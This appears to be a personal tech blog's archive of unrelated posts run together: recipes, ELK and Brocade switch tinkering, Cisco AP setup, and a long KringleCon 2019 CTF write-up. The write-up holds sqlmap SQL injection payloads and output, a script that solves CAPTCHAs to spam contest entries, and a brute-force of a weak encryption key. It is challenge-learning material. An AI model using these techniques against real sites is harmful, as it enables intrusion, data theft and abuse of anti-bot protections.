Kahdelle. Jos lisää laitaa enemmän spaghetti ja . Ainesosat:
- kastike:
- 1/2 Parmiggiano
- 4x munia
- Kerma
- Valkosipuli, öljy
- Yksi paketti Pekoni ja vähän kinkku :)
- Spaghetti
- Suola
Kahdelle. Jos lisää laitaa enemmän spaghetti ja . Ainesosat:
if (doc['bytes.keyword'].size()!=0) { return Integer.parseInt(doc['bytes.keyword'].value) }
This took me a while to figure out!
The above only works for Integer (so no 1.1 or 2.22).
It works on ELK 7.10
I needed it because I’m using %{COMBINEDAPACHELOG} GROK pattern.
That GROK pattern is built-in with logstash and just says NUMBER:bytes and number is (?:%{BASE10NUM})
https://github.com/logstash-plugins/logstash-patterns-core/blob/master/patterns/httpd#L5
There’s actually a way to specify in the grok pattern that it’s an integer:
%{NUMBER:field:integer}
https://github.com/logstash-plugins/logstash-patterns-core/issues/173 is an open issue from 2016 about this issue.
I guess what I should do is just make my own pattern with this fixed where I want it… I would really like to not fiddle with templates or add logstash mutate rules..
https://www.perdue.com/recipes/easy-thai-coconut-chicken-soup/2352/
Another submission courtesy of Eberhard.
Run anything here at your own risk. From what I can tell they should be fairly safe. Do make sure you run them on the switch itself. Pretty nice in case you don’t want to shell out for a Brocade branded USB stick to transfer firmwares!
Hi,
I found a description how to format a USB-Stick that could be accessed
by the brocade OS.
In fact after some investigation I noticed an error of this description
that prevents to
access this special configured stick.
To make life easier I modified the /sbin/hotplug script by adding one line.
Now any USB-Stick may be used for installation or backup purposes.
The modified hotplug script adds the VENDOR string to
/etc/fabos/usbstorage.conf if the vendor is unknown.
If you redo the “usbstorage -e” command the previously unknown Vendor
stick is been recognized by hotplug
and the activation of the access succeeds!
It might be annoying to do the activation of a stick twice but this has
to be done only if the vendor of the
usb-stick is new for your brocade switch.
Fabos is capable to handle VFAT32-formatted sticks.
The stick needs 5 directories (1 and 4 children):
/brocade/
/brocade/config
/brocade/firmware
/brocade/firmwarekey
/brocade/support
Here is the diff
# diff hotplug.orig hotplug
The above output means – “Add the ‘echo … ‘ bit on line 62”
62c62
<
—
> echo “VENDOR $vendor” >> $USBCONFIG
63a64
>
All stuff is been tested with FOS v7.4.2f.
Insert stick in a switch and run this script as root:
#!/bin/bash -x
insmod /lib/modules/default/kernel/drivers/usb/core/usbcore.ko
insmod /lib/modules/default/kernel/drivers/usb/host/hcd-driver.ko
insmod /lib/modules/default/kernel/drivers/usb/storage/usb-storage.ko
sleep 10
lsmod | grep usb
/bin/mknod -m 660 /dev/sda b 8 0
/bin/mknod -m 660 /dev/sda1 b 8 1
/bin/mknod -m 660 /dev/sda2 b 8 2
Sometimes the above script fails and you need to run it until it has usb_storage and usbcore modules listed as loaded kernel modules.
Now I can mount an ext3 formatted USB-stick:
# mkdir /usb_ext3
# mount -t ext3 /dev/sda1 /usb_ext3
# ls /usb_ext3/
bin/ dev/ fabos/ libexec@ sbin/ tftpboot/ var/
boot/ diag@ import/ mnt/ share@ tmp/
config/ etc/ initrd/ proc/ standby_sbin/ users/
core_files/ export/ lib/ root/ support_files/ usr/
# mkdir /usb_vfat
# mount -t vfat /dev/sda1 /usb_vfat
# ls /usb_vfat/
.Trash-1000/ brocade/ config/ firmware/ firmwarekey/ hda1.dmp* support/
I’ll stop here at the moment because now I need to know how u-boot
starts an OS from an USB-stick…
This post is based on a submission from a reader of this blog Eberhard, maybe primarily of the popular Brocade SAN upgrades post. Many thanks for this, hoping it will help someone out there!
The topic here is how to replace the embedded Compact Flash card if that breaks.
You can read about how to do that in the PDF below:
If your CF drives are exactly the same size (not in GB, in blocks) as the one in Brocade then you could get away with dding the whole /dev/sda – which would simplify the process a little.
Again, many thanks for the contribution!
Changing apartment again so a pretty decent time to change the network at home.
Doing it a bit on the cheap this time around.
We’ll get a docsis cable connection. Fortunately I have a modem used to connect to the same ISP from a previous apartment. Unfortunately the modem was a bit shit. Or it used to reboot or need a reboot every now and then.
The plan is now to put the modem into bridge mode and move the brains into two other devices.
First device: A Raspberry Pi 3B with openwrt installed. It’ll have an extra Realtek 8153 1Gbps USB port.
Internal NIC 100Mbps goes to LAN and will have DHCP Server. The external will have the WAN connection. The RPI 3b also has a WiFi, but it’s only 2.4GHz so we’ll only use that for local admin access.
Second device is a Cisco AP that I blogged about not too long ago. That can do 5GHz :) This hasn’t been used but I set it up so I can just plug it into an L2 with a DHCP and it should just work.
Will also use an unmanaged switch to connect stuff on the LAN.
One nice thing with the current apartment is the Ethernet in all rooms. New one might only have one cable TV/antenna port. Hoping for more. I’d rather not have to use some Ethernet over Power as there’s also a media server to connect onto the LAN or wifi near the Chromecast.. sometimes it’s nice to not throw everything away. Thought I had thrown away the cable modem too, but turns out I hadn’t. New one is 180€ and used ones seems to go quite quickly on second hand marketplaces.
And I’m on holiday :)
Wasn’t really expecting to be able to go on holiday working for a startup, but there’s some coverage and the old IT Admin is still there so very nice to be able to take time off and not have to worry. Even get some more later in the summer. All those extra hours I managed to squeeze in by not commuting to work got me a few extra weeks of holiday :)
Got lots of things in the pipeline to think about though, without going into much details they are important but quite some distance from what I’ve worked with so far – basically a whole ecosystem to get familiar with. Soon I’ll have to decide if I want to do it hacky way, learning what the proper way or try to outsource it. But what I want shouldn’t come first, what makes business sense should.
So far have enjoyed getting reacquainted with the ELK stack and getting acquainted with Prometheus for monitoring. No fancy queries yet, but so far looking quite OK.
Unsurprisingly I’ve also enjoyed doing some documentation work and keeping things patched :)
Was reminded that today was exactly one calendar month since I joined IQM Finland
It’s been a very hectic month and it’s been mostly remote because of the pandemic. Have met a few people, video chatted with a few. We have these weekly lunch meetings that is a good way to see and hear people . I try to bring up a little bit social non work things in the video meetings just to get to know people a little bit.
I’m really enjoying it and it’s been interesting to see how the company mindset makes such a difference to my work as a sysadmin/it specialist.
Ainesosat:
Käyttöohjeet :
Vesi ja liemikuutio yhteen kattilalle.
Makkarat panulle, ehkä 4/10 lämpö. Käytää kansi ja vaihta makkarat usein. Käytää haarukkaa ja tee muutama reikää makkaraan kun se on melkein valmis. 20 min? 30min ja liian aikaisin reikää makkaraa tulivat vähän kuiva mutta vielä hyviä
Voi toiseen kattilalle, sipuli ja riisi. 4 min.
Sitten laitta vettä risottokattilaan kun se on loppu. Riiisi on valmis kun se on pehmeä.
Viimeistä laitta makkarat ja parmeggiano
Pöytään!
9 years were significant and meaningful to me.
We did a lot of cool things that as a very nice side benefit helped research, both in Finland and in other places!
I’ve been involved in some core projects, both for internal users and external ones. I was free to release code as open source. I have solved hard problems, gotten rid of manual work with automation and helped people grow.
I’m happy to have met great friends and colleagues at CSCfi. I’ve learned so much and many thanks for showing how to work right and that it’s not all about 9-5 work.
It has been a rewarding experience. I like to think I’ve come quite some way from where I started. So long, @CSCfi, and thanks for (all the fish) lasting memories!
Contents
While the AP is in non autonomous mode you need to run a debug command to get the conf t: debug capwap console cli
To change it from using a controller to autonomous mode you need to load a firmware that is like that. The one I got had a firmware loaded that wanted to talk to a controller.
These release notes got me a bit worried: https://www.cisco.com/c/en/us/td/docs/wireless/access_point/ios/release/notes/aap-rn-83mr5.html
Conversions from an 8.0 Wireless LAN Controller unified release AP image to autonomous 15.3(3) k9w7 image will get aborted with a message “AP image integrity check failed.” To overcome this, load any previous autonomous k9w7 image and then upgrade to the 15.3(3) JAB k9w7 images. If this is the same as LWAPP version I had was 7.3.x so the above did not apply.
https://greenwhitehat.blogspot.com/2017/08/how-to-configure-cisco-access-point-air.html
https://www.fragmentationneeded.net/2010/08/tftp-oddities.html is talking about changing listening address to 255.255.255.255 instead of 0.0.0.0 ..
$ ena
# conf t
# debug capwap console cli
# archive download-sw /force-reload /overwrite tftp://10.0.0.2/c1140-k9w7-tar.153-3.JD17.tar
Easiest is probably to use the http on http://IP:80 to configure it
Username/Password: Cisco/Cisco
There’s the express setup and I used these settings:
Other changes:
One could enable https, but that used a too weak key by default so I just left it at http. In any case make sure to set the clock before enabling https.
Previous post in this blog about my home network: https://www.guldmyr.com/blog/home-network-convergence/
http://wiki.r1soft.com/display/ServerBackup/Configure+a+TFTP+server+on+Linux
http://exchange2013pikasuoh.blogspot.com/2015/08/convert-cisco-air-lap1142n-k9-to.html
In my youth I enjoyed the LANs. One fun game we played was Quadra – which is a multiplayer tetris where by playing the game you send more blocks to your opponents making it very stressful :D
https://github.com/quadra-game/quadra turns out it is open source and it’s out there!
Does it still build?
CentOS 7.7:
$ sudo yum install git
$ git clone github.com/quadra-game/quadra
$ sudo yum groupinstall "Development Tools"
$ sudo yum install SDL2-devel boost-devel libpng-devel
$ cd quadra
$ autoreconf -i
$ ./configure
$ make
It DOES!
Does it run!?
$ QUADRADIR=. ./quadra
And I get a very nice window :)
I could even launch one process to run a server and then another server and connect to localhost :) So multiplayer must sureley durely work!
It’s a big laggy – I recall it being very snappy because I was da bomb at this game :)
I blame this on that I might have missed some dependency and it now fell back into some easier something and or maybe the graphics card in this laptop is not good (maybe it’s too new? It’s a Skylake GT2 HD G 520).
Gött. I jämförelse med den jag hade innan så luktade denna mycket mera choklad och mindre bränt..
Contents
Hoe the season to be jolly! Been giving a few CTFs lately. It started with the disobey 2020 puzzle to get the hacker ticket. Then there was the OverTheWire‘s 2019 advent CTF. And finally this one, the SANS holiday hackmechallenge – KringleCon 2019. As of writing I got what felt like quite far in the disobey but got real nice stuck in the second keyhole. For OTF I found a similar but slightly easier challenge on the 6th day December, but did not manage to get the key. Most others except the first and challenge-zero I didn’t really have time for. So with not so much progress it was very nice to take a step back and try out KringleCon where I managed to get a bit further!
#!/usr/bin/python3
import random
#numbers = [ 1, 3, 7 ]
results = []
length = 4
digits = 1337
# from https://linuxconfig.org/function-to-check-for-a-prime-number-with-python
def is_prime_number(x):
if x >= 2:
for y in range(2,x):
if not ( x % y ):
return(False)
else:
return(False)
return(True)
# from https://trinket.io/python3/00754ec904
while len(results) < 1000:
for digit in range(1):
digits =''.join(str(random.randint(0, 9)) for i in range(length))
if "3" in digits and "1" in digits and "7" in digits and not "0" in digits and not "2" in digits and not "4" in digits and not "5" in digits and not "6" in digits and not "8" in digits and not "9" in digits:
if digits not in results:
if is_prime_number(int(digits)):
results.append(digits)
print(digits)
You’ll need to hit CTRL+C when it doesn’t find any more solutions. It’s not the fastest, has unused bits and I don’t know why it has the for digit in range(1) bit.
#!/usr/bin/python3
import json
with open('sysmon-data.json') as json_file:
data = json.load(json_file)
for p in data:
try:
print(p['command_line'])
except:
print(p['process_name'])
Finally got to get a bit familiar with powershell. I’m a lurker on r/sysadmin and very often there are powershell oneliners on display there. This was quite a fun one to be honest :) Kind of like using python directly in the shell.
Some things I learnt were:
$files = Get-childitem -Path /home/elf/depths -recurse -File
Foreach ($file in $files)
{
if((Get-FileHash -Path $file.fullname -Algorithm MD5).hash | Select-String 25520151A320B5B0D21561F92C8F6224){
$file
}
}
Could have found this with a recurse grep for temperature -e angle -e param..
The solution:
(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent $correct_gases_postbody = @{O='6';H='7';He='3';N='4';Ne='22';Ar='11';Xe='10';F='20';Kr='8';Rn='9'} (Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $correct_gases_postbody).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val=1.867).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent
#1
sudo iptables -P FORWARD DROP
sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
#2
# shouldbe in two lines? as the iptables output orders them related,established..
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
#3
sudo iptables -A INPUT -p tcp --dport 22 -s 172.19.0.225 -j ACCEPT
#4
sudo iptables -A INPUT -p tcp --dport 21 -s 0.0.0.0/0 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -s 0.0.0.0/0 -j ACCEPT
#5
sudo iptables -A OUTPUT -p tcp --dport 80 -d 0.0.0.0/0 -j ACCEPT
#6
sudo iptables -A INPUT -i lo -j ACCEPT
Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
haha! if you reload the page the codes needed are different!
1. B46DU583 - top of the console
2. XNUBLBKW - see it by lookingin ctrl p
3. unknown, fetched but never shown..
ha this was funneh, so clicking around the tabs found a javascript that needed some deobfuscate/jsnice.org and it found var _0x1e21
so I ran that in the console with the values found in if statements and eventually:
console.log(_0x1e21["jIdunh"]);
and it printed a bunch of things, and element 34 had an image:
console.log(_0x1e21["jIdunh"][34]);
VM3008:1 images/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12.png
which was image with combination to the 3rd lock
4. ILMJRNTP found in local storage
5 CJ4WCMG4 - <title></title>
6. from the card.. Y3WJVE01 sticker - but if one removes the hologram CSS the letters are in a different order JYV0EW13.
7. G7LDS1LS - font family
8 VERONICA In the event that the .eggs go bad, you must figure out who will be sad.
From client.js and then deobfuscated to make it a bit readable and just read through
9 8SEOGRW1
chakra in css file
https://sleighworkshopdoor.elfu.org/css/styles.css/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12
10. compopnent.swab, bunch of things around lock c10
finding .locks > li > .lock.c10 .cover
one can remove the cover
on the board there's a code: KD29XJ37
but all the other codes have been per session..
console.log says "Missing macaroni"
In the code there's:
console["log"]("Well done! Here's the password:");
console[_0x1e21("0x45")]("%c" + args["reward"], _0x1e21("0x46"));
In the console there's this whenever one presses the unlock:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Error: Missing macaroni!
at HTMLButtonElement.<anonymous> (73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1)
(anonymous) @ 73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1
there's a bunch of "<div class="component gnome, mac, swab" with data-codes: XJ0 A33 J39
Dragging the components further down changed the error and printed this in the console:
Well done! Here's the password:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 The Tooth Fairy
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 You opened the chest in 6291.088 seconds
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Well done! Do you have what it takes to Crack the Crate in under three minutes?
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Feel free to use this handy image to share your score!
console.log(document.title)
some are maybe fixed??:
VERONICA
KD29XJ37
However, after doing that as fast as I could manually:
You opened the chest in 150.151 seconds
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Very impressive!! But can you Crack the Crate in less than five seconds?
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Feel free to use this handy image to share your score!
head conn.log|jq '.["id.orig_h"],.duration' -c 'sort_by(.duration)'
cat conn.log|jq -s -c 'sort_by(.duration)' > /tmp/sorted
cat /tmp/sorted#... took forever, then just looked at the bottom:
{"ts":"2019-0
4-18T21:27:45.402479Z","uid":"CmYAZn10sInxVD5WWd","id.orig_h":"192.168.52.132","id.orig_p":8,"id.r esp_h":"13.107.21.200","id.resp_p":0,"proto":"icmp","duration":1019365.337758,"orig_bytes":3078192 0,"resp_bytes":30382240,"conn_state":"OTH","missed_bytes":0,"orig_pkts":961935,"orig_ip_bytes":577 16100,"resp_pkts":949445,"resp_ip_bytes":56966700}]
Finishing each challenge gives some tips to some other challenges. There was a hint to the Sled Route API suggesting to use jq. And there was another that if you beat the Trail Game on Hard there’s more hints? Also beating the lock game in under 3 minutes is another hint I think..
And then we get to the CAPTCHA + tensorflow madness! This was real fun, haven’t had to do much with tensorflow before. Did not have to read much at all about tensorflow to get this going, could basically just glue together the provided python scripts.
Another very good kringlecon talk on this topic: https://www.youtube.com/watch?v=jmVPLwjm_zs&feature=youtu.be led to a github repo. Some other code and training images were found as soon as one got far enough into the Steam Tunnels. I managed to after not too much googling get the python script to store the images in teh CAPTEHA in a directory and then run the predict tensorflow python script on the github repo against it. It was however too slow. Fortunately I had access to a machine with lots of cores so moving all the data there and re-running the python got it working for me. 2 oversubscribed cores and 2GB RAM was too little. 80 dedicated single server skylake cores and 356GB RAM completed it much faster. There were messages about tensorflow from pip not having been compiled with all the things enabled. I could I suppose also have tried this with a GPU :) And the PYTHON:
#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import os
import shutil
import base64
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
def load_labels(label_file):
label = []
proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
for l in proto_as_ascii_lines:
label.append(l.rstrip())
return label
def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
image = read_tensor_from_image_bytes(image_bytes)
results = sess.run(output_operation.outputs[0], {
input_operation.outputs[0]: image
})
results = np.squeeze(results)
prediction = results.argsort()[-5:][::-1][0]
q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )
def load_graph(model_file):
graph = tf.Graph()
graph_def = tf.GraphDef()
with open(model_file, "rb") as f:
graph_def.ParseFromString(f.read())
with graph.as_default():
tf.import_graph_def(graph_def)
return graph
def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
float_caster = tf.cast(image_reader, tf.float32)
dims_expander = tf.expand_dims(float_caster, 0)
resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
sess = tf.compat.v1.Session()
result = sess.run(normalized)
return result
# above is from predict_images_using_trained_model.py because python and import meh
###########
def main():
yourREALemailAddress = "MYREALEmAEL@example.org"
# Creating a session to handle cookies
s = requests.Session()
url = "https://fridosleigh.com/"
json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
b64_images = json_resp['images'] # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
challenge_image_type = json_resp['select_type'].split(',') # The Image types the CAPTEHA Challenge is looking for.
challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting
#print(b64_images)
# 0 wipe unknown_images dir
# why wipe it tho?
try:
shutil.rmtree('unknown_images')
except:
os.mkdir('unknown_images')
try:
os.mkdir('unknown_images')
except:
True
# 1 write b64 to unknown_images dir
imgcnt = 0
for image in b64_images:
imgcnt = imgcnt + 1
content = image['base64']
uuid = image['uuid']
try:
content=base64.b64decode(content)
filename = "unknown_images/%s" % uuid
with open(filename,"wb") as f:
f.write(content)
#f.write(content.decode("utf-8"))
except Exception as e:
print(str(e))
# if imgcnt > 10:
# break
# 2 run the predict against it
# python3 predict_images_using_trained_model.py would have been fun instead we copy pasta
# https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/retrain.py talks about mobilenet and speed optimizations..
# Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
labels = load_labels("/tmp/retrain_tmp/output_labels.txt")
# Load up our session
input_operation = graph.get_operation_by_name("import/Placeholder")
output_operation = graph.get_operation_by_name("import/final_result")
sess = tf.compat.v1.Session(graph=graph)
# Can use queues and threading to spead up the processing
q = queue.Queue()
unknown_images_dir = 'unknown_images'
unknown_images = os.listdir(unknown_images_dir)
#Going to interate over each of our images.
for image in unknown_images:
img_full_path = '{}/{}'.format(unknown_images_dir, image)
print('Processing Image {}'.format(img_full_path))
# We don't want to process too many images at once. 10 threads max
while len(threading.enumerate()) > 10:
time.sleep(0.0001)
#predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
image_bytes = open(img_full_path,'rb').read()
threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()
print('Waiting For Threads to Finish...')
while q.qsize() < len(unknown_images):
time.sleep(0.001)
#getting a list of all threads returned results
prediction_results = [q.get() for x in range(q.qsize())]
#do something with our results... Like print them to the screen.
# 3 get a list of the uuids for each type
good_images = []
for prediction in prediction_results:
print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction)) if prediction['prediction'] in challenge_image_types:
good_images.append(prediction['img_full_path'].split('/')[1])
# TensorFlow Predicted unknown_images/dc646068-e584-11e9-97c1-309c23aaf0ac is a Santa Hats with 99.86% Accuracy
# 4 make a new b64_images csv list with the uuids
print(challenge_image_types)
print(good_images)
good_images_csv = ','.join(good_images)
'''
MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
'''
# This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
#final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
final_answer = good_images_csv
json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
if not json_resp['request']:
# If it fails just run again. ML might get one wrong occasionally
print('FAILED MACHINE LEARNING GUESS')
print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
sys.exit(1)
print('CAPTEHA Solved!')
# If we get to here, we are successful and can submit a bunch of entries till we win
userinfo = {
'name':'Krampus Hollyfeld',
'email':yourREALemailAddress,
'age':180,
'about':"Cause they're so flippin yummy!",
'favorites':'thickmints'
}
# If we win the once-per minute drawing, it will tell us we were emailed.
# Should be no more than 200 times before we win. If more, somethings wrong.
entry_response = ''
entry_count = 1
while yourREALemailAddress not in entry_response and entry_count < 200:
print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
entry_response = s.post("{}api/entry".format(url), data=userinfo).text
entry_count += 1
print(entry_response)
if __name__ == "__main__":
main()
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://url?token=$token" -p variable
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://studentportal.elfu.org/application-check.php?elfmail=my%40example.com&token=$token" -p elfmail --eval="import requests;token=requests.get('https://studentportal.elfu.org/validator.php').text"
#SNIPSNIP
Parameter: elfmail (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: elfmail=my@example.com' AND 2977=2977 AND 'tYvj'='tYvj&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: elfmail=me@example.com' AND (SELECT 4602 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT (ELT(4602=4602,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XazW'='XazW&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==
Could not get the above queries to work in a curl.. maybe some escape messup. But sqlmap –users find stuff.
[18:51:19] [INFO] retrieved: 'elfu'
[18:51:20] [INFO] retrieved: 'applications'
[18:51:21] [INFO] retrieved: 'elfu'
[18:51:22] [INFO] retrieved: 'krampus'
[18:51:23] [INFO] retrieved: 'elfu'
sqlmap had a nice –sql-shell and with that one could “select * from elfu.krampus” which got us some paths:
select * from elfu.krampus [6]:
[*] /krampus/0f5f510e.png, 1
[*] /krampus/1cc7e121.png, 2
[*] /krampus/439f15e6.png, 3
[*] /krampus/667d6896.png, 4
[*] /krampus/adb798ca.png, 5
[*] /krampus/ba417715.png, 6
Now then that looks like an OS path, need to run a shell command.. but on a whim tried https://studentportal.elfu.org/krampus/ and yay found them there. Fired up good old GIMP and learnt about the rotate tool :P Yay, one more objective!
Crypto then. Hint is https://www.youtube.com/watch?v=obJdpKDpFBA&feature=youtu.be > https://github.com/CounterHack/reversing-crypto-talk-public
Running an encryption tells us it uses unix epoch as a seed and a hint to the challenge was ” We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. ” This is from 1575658800 to 1575666000 . There are some super_secure_random and super_secure_srand functions found with IDA freeware. Probably they are not super. https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptimportkey for example is one in use. I wonder what the difference with –insecure is? One error talks about DES-CBC which internet says is insecure. It uses 56-bits and 8bytes. Stack of do_encrypt also says “dd 8” so yay?
00000000 ; [00000008 BYTES. COLLAPSED UNION _LARGE_INTEGER. PRESS CTRL-NUMPAD+ TO EXPAND]
00000000 ; [00000008 BYTES. COLLAPSED STRUCT $FAF74743FBE1C8632047CFB668F7028A. PRESS CTRL-NUMPAD+ TO EXPAND]
Which is used in security_init_cookie And imp__QueryPerformanceCounter. Way more than 8 bytes though.
While looking at these listened to the youtube talk and it said “running it at the same time generates the same key” – tried that with two identical files and it generated the same key. What about with two files without same checksum? Yep. Same. Encryption key. So next step would be to try to encrypt something for every second between 1575658800 to 1575666000 ? That’s 7200. Which would give us 7200 keys we could try to use to decrypt the file. Is it too much? Right now I’m thinking the –insecure might help if one use the Burp suite to intercept the packages to the elfscrow api server? The time bit in the code uses time64
call time into eax
then eax as a parameter into:
call super_secure_srand
there is a loop (8) and inside that it calls super_secure_random which looks complicated but by googling the numbers in decimal we find: https://rosettacode.org/wiki/Linear_congruential_generator#C
which has
rseed * 214013 + 2531011
# the disasembled then does:
sar eax, 10h
and eax, 7FFFh
Which is also here: http://cer.freeshell.org/renma/LibraryRandomNumber/
And here I learnt that >> in python is the sar.
After goin walking thought a bit about what is the end goal here. And it is not the key, but it could be. Right now plan is to generate the secret-id, because the secret-id is what is used to decrypt with the tool, not the key. But maybe the uuid is something you only get from the escrow API server.
$ curl -XPOST http://elfscrow.elfu.org/api/store -d 1234567890abcdef
0e5b05dd-e132-42aa-b699-1829d3e23e2f
$ curl -XPOST http://elfscrow.elfu.org/api/retrieve -d 0e5b05dd-e132-42aa-b699-1829d3e23e2f
1234567890abcdef
Seems it is. And the hex needs to be in lower letters. ABCDEF did not fly. UUID must be in this format: 00000000-0000-0000-0000-000000000000 it seems. Not sure about sqlmap use here. . SSH and web server is running. But SSH has been open on several previous addresses in this CTF too..
WEBrick/1.4.2 (Ruby/2.6.3/2019-04-16) at
elfscrow.elfu.org:443
Actually what might be doable with just the key is to: setup my own API server that just returns the key.. Change the address in the binary or finally use BURP or local DNS override? Still need to figure out the key :))
Generate_key does:
call ?super_secure_random@@YAHXZ ; super_secure_random(void)
movzx ecx, al
and ecx, 0FFh
mov edx, [ebp+buffer]
add edx, [ebp+i]
mov [edx], cl
super_secure_srand does:
something with seed.. really unsure
super_secure_srandom does:
this is doing the rseed, sar, and
#!/usr/bin/python3
# key examples
# dcd5ed4c2acba87e
# 9f32148fe8ef55a8
# 0d2bac4df0a12e5a
# fa41fb5131993bf5
#https://www.aldeid.com/wiki/X86-assembly/Instructions/shr
# like the >> much more than ^
# https://rosettacode.org/wiki/Linear_congruential_generator#Python
def msvcrt_rand(seed):
def rand():
nonlocal seed
fixed = seed
keyarray = bytearray()
for i in range(8):
#ka = (214013*seed + 2531011)
fixed = fixed * 0x343fd + 0x269ec3
key = hex(fixed >> 0x10 & 0x7ffffff)[-2:] # >> sar 16 & is and. We only want the last two bytes - the start look very similar..
if 'x' in key:
key = key.replace('x', '0') # because movzx
key = bytes.fromhex(key)
keyarray.append(key[0])
return(keyarray) # last two
return(rand())
seed = range(1575658800,1575666001)
# so not off by 1 ^
for rseed in seed:
two = msvcrt_rand(rseed)
print(two.hex())
Trying the edit hosts file. As I use WSL I learnt that for .exe files I also need to update window’s hosts file, even though I run it from inside the WSL! Also the syntax is NOT:
localhost elfscrow.elfu.org
Bunch of false positives for some reason… when I use the list of keys I generated and my API and a localhost flask API and hosts file override. Anyway, let this run and used file to stop when it found a pdf, it stopped at 4849 (or 4850th key in keys [] in my python api.py, unsure if that is sorted.. so the creation time might have been 1575663650 ( Friday, December 6, 2019 8:20:50 PM ) :
#!/bin/bash
# the Bruter
for i in $(seq 0 7200); do
./elfscrow.exe --decrypt --id=7debfae7-3a16-41e7-b211-678f5ebdce00 ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc out.pdf --insecure
if [ -f out.pdf ]; then
isitpdf=$(file out.pdf|grep -c PDF)
if [ $isitpdf != 0 ]; then
echo $isitpdf
echo "GOT IT $i"
exit 123
else
mv -v out.pdf "falses/$i.pdf"
fi
fi
done
and the API.py
#https://stoplight.io/blog/python-rest-api/
from flask import Flask, json
import os
keys = ["b5ad6a321240fbec", "7200...", "7199", "..."]
api = Flask(__name__)
@api.route('/api/retrieve', methods=['POST'])
def get_companies():
# store last key tested in a file
statefile = "/root/elfscrow_status"
with open(statefile,"r") as r:
content = r.read()
try:
int(content)
except ValueError:
with open(statefile,"w+") as f:
f.write("0")
return("0")
icontent = int(content)
ncontent = int(content) + 1
print("Last was %s, updating to %s" % (icontent, ncontent))
with open(statefile,"w+") as f:
f.write(str(ncontent))
return str(keys[ncontent])
#return json.dumps(companies)
if __name__ == '__main__':
api.run(port=80)
Then to get the key was just a pdf2txt and the 5 word sentence in the beginning of the document!
The username was found in https://srf.elfu.org/README.md
Started on this earlier but stopped because I wasn’t feeling it and it was a bit tedious.
Plan: Make the queries programmatically. Also this time check sizes of requests maybe that’s important. Also time when attacks happen could be useful?
let’s try out RITA as indicated in a hint, also found Malcolm while looking up this tool.. could be fun. But at least RITA couldn’t import the http.log :/
weird that the IPs in with the LFI, shellshock etc haven’t posted.. maybe they posted later?
